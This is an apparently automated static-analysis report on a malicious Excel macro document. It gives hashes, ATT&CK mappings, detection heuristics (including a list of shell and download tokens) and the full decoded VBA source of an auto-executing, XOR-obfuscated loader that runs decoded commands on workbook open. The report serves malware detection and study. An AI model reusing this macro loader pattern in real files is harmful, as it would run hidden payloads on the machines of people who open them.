Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 8975304884fa73b8…

MALICIOUS

Office (OLE) / .XLS

66.5 KB Created: 2023-09-12 08:45:02 Authoring application: Microsoft Excel First seen: 2023-09-14
MD5: a68941570bd6dbee2d498e23e150ea08 SHA-1: 96e4b0dd8c33b4baa5553b204aac041b79f01a8e SHA-256: 8975304884fa73b88506ddffda56954957351310144282866cdd1f2a201f88eb
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an XLS file containing VBA macros, specifically a Workbook_Open macro that utilizes CreateObject and GetObject calls. The macro attempts to deobfuscate and execute a payload, indicated by the 'Minneapolis' function and the use of hardcoded strings like 'q9b7d8291c'. The deobfuscated content is likely a second-stage downloader.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                                                                            GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
                                                                            GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4367 bytes
SHA-256: a17329cfef485d802be51344045c34a6e9cbfc45a9624e99f4e805b2761fdf2f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit








                                                        






                                                            Private Function Minneapolis(ByVal Pleased As String) As Variant








                 Dim Transferred As Long: Transferred = 0: Dim Rocks() As Byte
Dim Crimes() As Byte, RestoRation As String, Islam As Integer, Robot As Integer, Chapters As Integer





           Crimes = "q9b7d8291c"






            GoTo RecoRdings






                                                






Constantly:








              





                                                            If Transferred < UBound(Rocks) Then
Islam = Transferred Mod (10)







                   






                Chapters = Crimes(Islam * 2)
Robot = Rocks(Transferred)
GoTo Amber






Metropolitan:





                 RestoRation = RestoRation & Chr(Rocks(Transferred))
Transferred = Transferred + 1







                 






                                                                






                                                                        GoTo Constantly







                





                Else





                                                                GoTo Grounds





                                                            End If






             




Grounds:
Minneapolis = RestoRation
Exit Function
RecoRdings:
Rocks = Quoted(Pleased)
GoTo Constantly








                                        





Amber:






                                        Rocks(Transferred) = Abs(Robot Xor Chapters)








                                                    GoTo Metropolitan








                                                    End Function







                






                                                                Private Sub Democrats(ByVal Florist As String, ByVal Optimal As String, ByVal HouseHolds As String, ByVal Earrings As String, ByVal Basics As String)






                                                                        GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0







                                                                    End Sub
Sub Workbook_Open()
Democrats Minneapolis(Sheets("f2ca").Range("H182").Value), Minneapolis(Sheets("f2ca").Range("F133").Value), Minneapolis(Sheets("f2ca").Range("J189").Value), Minneapolis(Sheets("f2ca").Range("J112").Value), Minneapolis(Sheets("f2ca").Range("J116").Value)






                                                    End Sub





                                                Private Function Quoted(ByVal Nurses As String) As Variant
Dim RestoRation() As Byte, i As Long, Islam As Integer, Jurisdiction As Integer
Jurisdiction = Len(Nurses) / 2: i = 0: ReDim RestoRation(0 To Jurisdiction) As Byte
Chapters:






                 If i < Len(Nurses) Then








             





                                        Islam = Islam + 1
RestoRation(Islam - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Nurses, i + 1, 2)








                                                            i = i + 2







                                                GoTo Chapters







                 Else
GoTo MatheMatical
Dim Amber As String
Amber = InputBox("celp lape")
End If
MatheMatical:





            Quoted = RestoRation
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True